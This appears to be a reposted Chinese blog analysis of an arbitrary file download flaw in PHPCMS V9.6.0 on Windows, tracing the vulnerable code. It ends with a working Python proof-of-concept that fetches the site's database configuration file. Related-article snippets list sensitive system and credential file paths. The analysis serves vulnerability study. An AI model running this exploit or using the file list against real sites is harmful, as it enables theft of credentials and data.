PHPCMS V9 任意文件下载(Windows)

最新推荐文章于 2024-05-12 13:59:42 发布
最新推荐文章于 2024-05-12 13:59:42 发布
阅读量297 收藏
点赞数
文章标签: php python
原文链接:http://www.cnblogs.com/yangxiaodi/p/6881609.html
版权

 

 

先来看看PHPCMS V9.6.0的任意下载

 

还是和上次的注入一样,是个由parse_str() 函数引发的变量覆盖。

 位于 /phpv9.6.0/phpcms/modules/content/down.php 的init() 函数  第11-82行

先是获取$a_k = trim($_GET['a_k']);  跟注入分析的时候一样就不多bb了,

 

参数f就是要下载的文件值,继续执行,当遇到p72行

if(preg_match('/(php|phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$f) || strpos($f, ":\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error')); 

可以看到利用黑名单的策略,但是在windows下有个坑。文章(http://www.jinglingshu.org/?p=8790

对于ph> ,在windows下得到的结果和php一样,这种特性造成了绕过,使得服务器上的文件得以下载。(我用的是mac,所以测试这个漏洞的时候,手动删除了php这个关键字来测试漏洞。)

接着继续跟进:

		if(preg_match('/(phtml|php3|php4|jsp|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i',$f) || strpos($f, ":\\")!==FALSE || strpos($f,'..')!==FALSE) showmessage(L('url_error'));
		if(strpos($f, 'http://') !== FALSE || strpos($f, 'ftp://') !== FALSE || strpos($f, '://') === FALSE) {
			$pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');
			$a_k = urlencode(sys_auth("i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid, 'ENCODE', $pc_auth_key));
			$downurl = '?m=content&c=down&a=download&a_k='.$a_k;
		} else {
			$downurl = $f;			
		}

  下面有个if的判断,如果在$f中存在 http://,ftp:// 这些字符串 ,将返回TURE,如果存在 :\\ 字符串,将返回FALSE,但他用|| 连接而成,只要有一个TURE就能执行下面的内容。感觉这里可以放远程文件,没验证。(这里没验证,在download里面验证了)

接着就是对$a_l的值进行加密,返回$downurl。  当你点击下载的时候,触发download函数,

 

这时候的&a_k值是init()函数提供的,

if(strpos($fileurl, ':/') && (strpos($fileurl, pc_base::load_config('system','upload_url')) === false))

  在106行的时候发现这句,对远程文件有个验证,如果存在:/这个字符串,就返回location:的内容 ,不进行后面的文件下载了。所以这里不能用远程文件,只能用相对路径。

 

最后进行到file_down()函数里面,位于 /phpv9.6.0/phpcms/libs/functions/global.func.php  第1195-1204行

读取$fulepath的内容,结束。

 

测试的时候有个坑,在windows中,windows把\ /当成了目录,但linux,对于\/并不会把他当做\。

参考url:

https://www.seebug.org/vuldb/ssvid-92959

http://www.jinglingshu.org/?p=8790

 

poc:基于上次的修改下payload,凑合着用

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# project = https://github.com/Xyntax/POC-T
# author = i@cdxy.me



import requests
import re
from urllib import quote

TIMEOUT = 3




def poc(url):

    payload = "%26id%3D1%26m%3D1%26f%3Dcaches%252fconfigs%252fdatabase.ph%253C%26modelid%3D1%26catid%3D1%26s%3D%26i%3D1%26d%3D1%26"

    cookies = {}
    step1 = '{}/index.php?m=wap&a=index&siteid=1'.format(url)
    for c in requests.get(step1, timeout=TIMEOUT).cookies:
        if c.name[-7:] == '_siteid':
            cookie_head = c.name[:6]
            cookies[cookie_head + '_userid'] = c.value
            cookies[c.name] = c.value
            break
    else:
        return False

    step2 = "{}/index.php?m=attachment&c=attachments&a=swfupload_json&src={}".format(url, quote(payload))
    for c in requests.get(step2, cookies=cookies, timeout=TIMEOUT).cookies:
        if c.name[-9:] == '_att_json':
            enc_payload = c.value
            break
    else:
        return False

    setp3 = url + '/index.php?m=content&c=down&a_k=' + enc_payload
    r = requests.get(setp3, cookies=cookies, timeout=TIMEOUT)
    print r.content

print poc('http://phpstudy.com/phpv9.6.0/')

  

 

转载于:https://www.cnblogs.com/yangxiaodi/p/6881609.html

aixuan9365
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHPCMS V9源码
05-31
PHPCMS V9源码,需要的同学请下载...............................................................................................................
linux phpcms,PHPCMS任意文件下载之exp编写
weixin_31185473的博客
05-25 166
导读学习编写漏洞利用exp,其实原理很简单,就是模拟人工操作。利用代码将漏洞步骤一步步展现出来,今天我们就来和大家一起学习如何编写你自己的exp实验工具:firefox,burp,phpcms9.6.0实验语言:Python3.4实验环境:php+mysql+apache首先我们先来看看今天的phpcms任意文件下载漏洞复现步骤这里可以建议大家去看下phpcms任意文件下载代码审计的思路流程。然后...
phpcms down.php 漏洞,phpcms v9.6.1任意文件下载漏洞分析及EXP
weixin_32161697的博客
03-18 523
阅读:7,963之前PHPCMS V9.6.0被爆出来一波SQL注入个getshell的漏洞,官方修复了(典型的指哪修哪)并且发布了V9.6.1。但是并没有修复完全,又被搞出来一个任意文件下载的漏洞,此漏洞Payload同样可以绕过WAF检测。漏洞分析这个漏洞的套路跟之前的那个SQL注入漏洞一样。这次我们顺着来看这个漏洞产生的过程。漏洞触发点在文件/phpcms/modules/content/d...
文件包含漏洞,任意文件下载/读取,常用敏感文件总结
06-11 2617
Windows: C:\boot.ini //查看系统版本 C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件 C:\Windows\repair\sam //存储系统初次安装的密码 C:\Program Files\mysql\my.ini //Mysql配置 C:\Program Files\mysql\data\mysql\user.MYD //Mysql root C:\Windows\php.ini //php配置信息 C:\Wind
任意文件下载
bylfsj的博客
09-26 2475
4.2.4 任意文件下载 1、漏洞描述 目录遍历(任意文件下载)漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下web中的文件,而且...
phpcms v9的问答模块插件
02-05
phpcms v9的问答模块插件,代码为utf8,经过测试可以用。 phpcms v9的问答模块插件,代码为utf8,经过测试可以用。
phpcms V9 常用文件目录结构
09-29
最近正在为一个使用phpcms程序的网站做修改,从头学习phpcms。这个cms自由度很大,很多功能可以轻易的实现(当然,它不是万能的)
phpcms_v9 后台上传图片按钮无法点击
06-21
因为目前浏览器不支持flash,导致phpcms后台上传图片按钮无法点击,试了很多浏览器都不行。这个方法操作简单,亲测快速有效,原理是将原来的上传图片插件更改为h5图片上传插件。
PhpCMS V9代码生成器.zip
07-11
PhpCMS V9代码生成器可以帮助PhpCMS V9模板制作者快速高效地制作模板,功能代码速查,代码自动生成,方便调用,让您在制作PhpCMS V9模板时得心应手,PhpCMS V9爱好者必备!  [更新]  PhpCMS V9模板代码器 V1.5...
phpcms V9实现QQ登陆OAuth2.0提供下载
09-29
phpcmsV9使用的QQ登陆依然是OAuth1.0,但现在腾讯已经不审核使用OAuth1.0的网站了。这对于使用pc的站长来讲是一个无比巨大的坑。经过对phpcms论坛的一位同学做的插件进行修改,现在完美实现QQ登陆,暂无发现bug
任意文件下载(读取)
星落的博客
08-29 4477
漏洞简介:一些网站由于业务需求,往往需要提供文件查看或下载功能。一般来说在文件下载或查看功能处,当文件名参数可控,且系统未对参数进行严格过滤或者过滤不严格时,就能够实现下载服务器上的任何文件,产生任意文件下载漏洞,黑客可以利用( ../ )跳出程序本身的限制目录实现下载任意文件。...
phpcmsv9 补丁
erjian666的博客
09-12 369
修复方法: 打开phpcms\libs\classes\attachment.class.php 在168行代码下面添加如下代码 1 if(!stripos($ext,$filename)){ 2 $arryfilename = explode("|", $ext); 3 foreach($arryfilename as $n=>$fn){ 4
PHPCMS_v9.6.1_任意文件下载复现
xy_sugar的博客
03-23 1686
环境搭建 ①在phpstudy下进行环境的搭建 ②安装成功后用之前设置的管理员账号密码登陆后台 ③开启phpcms手机门户,然后退出管理后台 漏洞复现 ①访问该站点http://127.0.0.1/phpcmsfx/index.php?m=wap&c=index&a=init&siteid=1并且用firebug获取该网站的cook...
任意文件读取与下载漏洞
热门推荐
qwzf
11-14 1万+
前言 上周参加了一个线上赛。有个Web题的WriteUp说是任意文件下载。由于之前没学过,所以就没有想到。现在学习一下 为什么产生任意文件读取与下载漏洞 一些网站的业务需要,可能提供文件查看或下载的功能,如果对用户查看或下载文件不做限制,就能够查看或下载任意文件,可以是源文件,敏感文件等等。 任意文件读取漏洞 任意文件读取是属于文件操作漏洞的一种,一般任意文件读取漏洞可以读取配置信息甚至系统重...
学习任意文件下载漏洞
doraemon12345的博客
05-27 1142
什么是任意文件下载漏洞 文件下载漏洞是指文件下载功能没有对下载文件类型、目录做合理严谨的过滤,导致用户可以下载服务器的任意文件任意文件下载漏洞的危害 用户可以任意下载文件,例如脚本、代码服务器配置文件等。利用得到的代码进行审计分析有可能得到其它漏洞来进行攻击 任意文件下载漏洞如何利用 Google hacking上看 inurl:"readfile.php?file=" 从链接上看: download.php?path= download.php?file= down.php?file= data.
为什么Redis6.0引入了多线程
IT深耕十余载,大道之简
05-11 520
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
thinkphp8 framework和 element plus admin前后端分离系统之PHP安装教程
最新发布
luck332的专栏
05-12 378
DIYGW-UI-PHP是一款基于thinkphp8 framework和 element plus admin开发而成的前后端分离系统。目的是结合现有diygw-ui打造一个后台API开发。实现PHP源码前请先下载小皮面板或者宝塔。系统已经集成了部分功能。
如何防止WordPress网站内容被抓取
AIDigital的博客
05-09 509
最近在检查网站服务器的访问日志的时候,发现了大量来自同一个IP地址的的请求,用站长工具分析确认了我的网站内容确实是被他人的网站抓取了,我第一时间联系了对方网站的服务器提供商投诉了该网站,要求对方停止侵权行为,然而这只能暂时性的解决问题,为了避免以后再有意外发生,我结合了咨询Hostease的技术支持得到的反馈以及自己从网上了解到的信息,做了以下的优化,分享出来希望能对大家有一些帮助。抓取工具在抓取网站内容的时候,需要依赖网站的RSS feed,对RSS feed做一些小的调整,就可以防止内容被抓取。
phpcms v9安装
08-30
1. 首先,您需要下载phpcms v9的安装包,您可以从官方网站(https://www.phpcms.cn/)获取最新版本的安装包。 2. 解压下载的安装包,并将文件上传到您的Web服务器目录中。您可以使用FTP工具或者控制面板中的文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值